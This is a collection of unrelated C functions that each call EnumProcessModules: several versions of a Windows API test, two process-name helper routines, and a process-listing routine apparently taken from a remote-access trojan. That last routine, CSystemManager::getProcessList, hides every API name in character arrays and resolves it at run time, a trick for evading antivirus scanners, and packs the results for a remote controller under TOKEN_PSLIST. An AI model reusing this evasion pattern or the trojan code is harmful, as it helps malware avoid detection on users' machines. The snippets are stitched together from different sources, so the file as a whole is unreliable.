static void test_EnumProcessModules(void) { HMODULE hMod = GetModuleHandle(NULL); DWORD ret, cbNeeded = 0xdeadbeef; SetLastError(0xdeadbeef); pEnumProcessModules(NULL, NULL, 0, &cbNeeded); ok(GetLastError() == ERROR_INVALID_HANDLE, "expected error=ERROR_INVALID_HANDLE but got %d\n", GetLastError()); SetLastError(0xdeadbeef); pEnumProcessModules(hpQI, NULL, 0, &cbNeeded); ok(GetLastError() == ERROR_ACCESS_DENIED, "expected error=ERROR_ACCESS_DENIED but got %d\n", GetLastError()); SetLastError(0xdeadbeef); ret = pEnumProcessModules(hpQV, NULL, 0, &cbNeeded); ok(ret == 1, "failed with %d\n", GetLastError()); SetLastError(0xdeadbeef); ret = pEnumProcessModules(hpQV, &hMod, sizeof(HMODULE), &cbNeeded); if(ret != 1) return; ok(cbNeeded / sizeof(HMODULE) >= 3 && cbNeeded / sizeof(HMODULE) <= 5 * sizeof(HMODULE), "cbNeeded=%d\n", cbNeeded); ok(hMod == GetModuleHandle(NULL), "hMod=%p GetModuleHandle(NULL)=%p\n", hMod, GetModuleHandle(NULL)); }
static void test_EnumProcessModules(void) { HMODULE hMod = GetModuleHandle(NULL); DWORD cbNeeded = 0xdeadbeef; w32_err(pEnumProcessModules(NULL, NULL, 0, &cbNeeded), ERROR_INVALID_HANDLE); w32_err(pEnumProcessModules(hpQI, NULL, 0, &cbNeeded), ERROR_ACCESS_DENIED); w32_suc(pEnumProcessModules(hpQV, NULL, 0, &cbNeeded)); if(!w32_suc(pEnumProcessModules(hpQV, &hMod, sizeof(HMODULE), &cbNeeded))) return; ok(cbNeeded / sizeof(HMODULE) >= 3 && cbNeeded / sizeof(HMODULE) <= 5 * sizeof(HMODULE), "cbNeeded=%d\n", cbNeeded); ok(hMod == GetModuleHandle(NULL), "hMod=%p GetModuleHandle(NULL)=%p\n", hMod, GetModuleHandle(NULL)); }
static void test_EnumProcessModules(void) { HMODULE hMod = GetModuleHandleA(NULL); DWORD ret, cbNeeded = 0xdeadbeef; SetLastError(0xdeadbeef); pEnumProcessModules(NULL, NULL, 0, &cbNeeded); ok(GetLastError() == ERROR_INVALID_HANDLE, "expected error=ERROR_INVALID_HANDLE but got %d\n", GetLastError()); SetLastError(0xdeadbeef); pEnumProcessModules(hpQI, NULL, 0, &cbNeeded); ok(GetLastError() == ERROR_ACCESS_DENIED, "expected error=ERROR_ACCESS_DENIED but got %d\n", GetLastError()); SetLastError(0xdeadbeef); ret = pEnumProcessModules(hpQI, &hMod, sizeof(HMODULE), NULL); ok(!ret, "succeeded\n"); ok(GetLastError() == ERROR_ACCESS_DENIED, "expected error=ERROR_ACCESS_DENIED but got %d\n", GetLastError()); SetLastError(0xdeadbeef); ret = pEnumProcessModules(hpQV, &hMod, sizeof(HMODULE), NULL); ok(!ret, "succeeded\n"); ok(GetLastError() == ERROR_NOACCESS, "expected error=ERROR_NOACCESS but got %d\n", GetLastError()); SetLastError(0xdeadbeef); ret = pEnumProcessModules(hpQV, NULL, 0, &cbNeeded); ok(ret == 1, "failed with %d\n", GetLastError()); SetLastError(0xdeadbeef); ret = pEnumProcessModules(hpQV, NULL, sizeof(HMODULE), &cbNeeded); ok(!ret, "succeeded\n"); ok(GetLastError() == ERROR_NOACCESS, "expected error=ERROR_NOACCESS but got %d\n", GetLastError()); SetLastError(0xdeadbeef); ret = pEnumProcessModules(hpQV, &hMod, sizeof(HMODULE), &cbNeeded); if(ret != 1) return; ok(hMod == GetModuleHandleA(NULL), "hMod=%p GetModuleHandleA(NULL)=%p\n", hMod, GetModuleHandleA(NULL)); ok(cbNeeded % sizeof(hMod) == 0, "not a multiple of sizeof(HMODULE) cbNeeded=%d\n", cbNeeded); /* Windows sometimes has a bunch of extra dlls, presumably brought in by * aclayers.dll. */ if (cbNeeded < 4 * sizeof(HMODULE) || cbNeeded > 30 * sizeof(HMODULE)) { HMODULE hmods[100]; int i; ok(0, "cbNeeded=%d\n", cbNeeded); pEnumProcessModules(hpQV, hmods, sizeof(hmods), &cbNeeded); for (i = 0 ; i < cbNeeded/sizeof(*hmods); i++) { char path[1024]; GetModuleFileNameA(hmods[i], path, sizeof(path)); trace("i=%d hmod=%p path=[%s]\n", i, hmods[i], path); } } }
BOOL get_pname_by_pid(u_long pid, char *buf, int buf_size) { BOOL result; HANDLE h_process; HMODULE h_module = NULL; DWORD n; if (g_psapi == NULL) return FALSE; // failed to load psapi.dll // try to resolve pid to pname h_process = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pid); if (h_process != NULL) pEnumProcessModules(h_process, &h_module, sizeof(h_module), &n); // on error write pid if (h_module == NULL || pGetModuleFileNameEx(h_process, h_module, buf, buf_size) == 0) { // for "System" process last error value is: // * ERROR_PARTIAL_COPY (on 2k) // * ERROR_NOACCESS (on NT4) // ??? on other (TODO: think about another way) if (GetLastError() == ERROR_PARTIAL_COPY || GetLastError() == ERROR_NOACCESS) { strncpy(buf, "System", buf_size); buf[buf_size - 1] = '\0'; result = TRUE; } else { *buf = '\0'; result = FALSE; } } else { if (strchr(buf, '~') != NULL) { // XXX is it a right way? // try to convert long name to short name char long_name[MAX_PATH]; my_GetLongPathName(buf, long_name, sizeof(long_name)); strncpy(buf, long_name, buf_size - 1); buf[buf_size - 1] = '\0'; } result = TRUE; } if (h_process != NULL) CloseHandle(h_process); return result; }
int GetAppByWindow(HWND Window, LPSTR processName) { processName[0]=0; DWORD pid; HANDLE hPr; GetWindowThreadProcessId(Window, &pid); // determine the process id of the window handle if (pCreateToolhelp32Snapshot && pModule32First && pModule32Next) { // grab all the modules associated with the process hPr = pCreateToolhelp32Snapshot(TH32CS_SNAPMODULE, pid); if (hPr != INVALID_HANDLE_VALUE) { MODULEENTRY32 me; HINSTANCE hi = (HINSTANCE)GetWindowLongPtr(Window, GWLP_HINSTANCE); me.dwSize = sizeof(me); if (pModule32First(hPr, &me)) do if (me.hModule == hi) { strcpy(processName, me.szModule); break; } while (pModule32Next(hPr, &me)); CloseHandle(hPr); } } else if (pGetModuleBaseName && pEnumProcessModules) { HMODULE hMod; DWORD cbNeeded; hPr = OpenProcess(PROCESS_QUERY_INFORMATION|PROCESS_VM_READ, FALSE, pid); if (hPr != NULL) { if (pEnumProcessModules(hPr, &hMod, sizeof(hMod), &cbNeeded)) { pGetModuleBaseName(hPr, hMod, processName, MAX_PATH); } CloseHandle(hPr); } } // dbg_printf("appname = %s\n", processName); return strlen(processName); }
LPBYTE CSystemManager::getProcessList() { HANDLE hSnapshot = NULL; HANDLE hProcess = NULL; HMODULE hModules = NULL; PROCESSENTRY32 pe32 = {0}; DWORD cbNeeded; char strProcessName[MAX_PATH] = {0}; LPBYTE lpBuffer = NULL; DWORD dwOffset = 0; DWORD dwLength = 0; char SSzlC11[] = {'K','E','R','N','E','L','3','2','.','d','l','l','\0'}; char SSzlC10[] = {'C','r','e','a','t','e','T','o','o','l','h','e','l','p','3','2','S','n','a','p','s','h','o','t','\0'}; CreateToolhelp32SnapshotT pCreateToolhelp32Snapshot= (CreateToolhelp32SnapshotT)GetProcAddress(LoadLibrary(SSzlC11),SSzlC10); hSnapshot = pCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(hSnapshot == INVALID_HANDLE_VALUE) return NULL; pe32.dwSize = sizeof(PROCESSENTRY32); char SSzlC20[] = {'L','o','c','a','l','A','l','l','o','c','\0'}; LocalAllocT pLocalAlloc=(LocalAllocT)GetProcAddress(LoadLibrary("KERNEL32.dll"),SSzlC20); lpBuffer = (LPBYTE)pLocalAlloc(LPTR, 1024); lpBuffer[0] = TOKEN_PSLIST; dwOffset = 1; char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'}; lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01); LocalSizeT pLocalSize=(LocalSizeT)GetProcAddress(LoadLibrary(SSzlC11),"LocalSize"); char FBwWp14[] = {'O','p','e','n','P','r','o','c','e','s','s','\0'}; OpenProcessT pOpenProcess=(OpenProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp14); char MyProcess32Next[] ={'P','r','o','c','e','s','s','3','2','N','e','x','t','\0'}; Process32NextT pProcess32Next= (Process32NextT)GetProcAddress(LoadLibrary(SSzlC11),MyProcess32Next); char MyProcess32First[] ={'P','r','o','c','e','s','s','3','2','F','i','r','s','t','\0'}; Process32FirstT pProcess32First= (Process32FirstT)GetProcAddress(LoadLibrary(SSzlC11),MyProcess32First); char FBwWp29[] = {'L','o','c','a','l','R','e','A','l','l','o','c','\0'}; LocalReAllocT pLocalReAlloc=(LocalReAllocT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp29); char DYrEN15[] = {'E','n','u','m','P','r','o','c','e','s','s','M','o','d','u','l','e','s','\0'}; EnumProcessModulesT pEnumProcessModules=(EnumProcessModulesT)GetProcAddress(LoadLibrary("PSAPI.DLL"),DYrEN15); char DYrEN13[] = {'G','e','t','M','o','d','u','l','e','F','i','l','e','N','a','m','e','E','x','A','\0'}; GetModuleFileNameExAT pGetModuleFileNameExA=(GetModuleFileNameExAT)GetProcAddress(LoadLibrary("PSAPI.DLL"),DYrEN13); if(pProcess32First(hSnapshot, &pe32)) { do { hProcess = pOpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pe32.th32ProcessID); if ((pe32.th32ProcessID !=0 ) && (pe32.th32ProcessID != 4) && (pe32.th32ProcessID != 8)) { pEnumProcessModules(hProcess, &hModules, sizeof(hModules), &cbNeeded); pGetModuleFileNameExA(hProcess, hModules, strProcessName, sizeof(strProcessName)); // 此进程占用数据大小 dwLength = sizeof(DWORD) + plstrlenA(pe32.szExeFile) + plstrlenA(strProcessName) + 2; // 缓冲区太小,再重新分配下 if (pLocalSize(lpBuffer) < (dwOffset + dwLength)) lpBuffer = (LPBYTE)pLocalReAlloc(lpBuffer, (dwOffset + dwLength), LMEM_ZEROINIT|LMEM_MOVEABLE); Gyfunction->my_memcpy(lpBuffer + dwOffset, &(pe32.th32ProcessID), sizeof(DWORD)); dwOffset += sizeof(DWORD); Gyfunction->my_memcpy(lpBuffer + dwOffset, pe32.szExeFile, plstrlenA(pe32.szExeFile) + 1); dwOffset += plstrlenA(pe32.szExeFile) + 1; Gyfunction->my_memcpy(lpBuffer + dwOffset, strProcessName, plstrlenA(strProcessName) + 1); dwOffset += plstrlenA(strProcessName) + 1; } } while(pProcess32Next(hSnapshot, &pe32)); } lpBuffer = (LPBYTE)pLocalReAlloc(lpBuffer, dwOffset, LMEM_ZEROINIT|LMEM_MOVEABLE); char BrmAP29[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'}; CloseHandleT pCloseHandle=(CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),BrmAP29); pCloseHandle(hSnapshot); return lpBuffer; }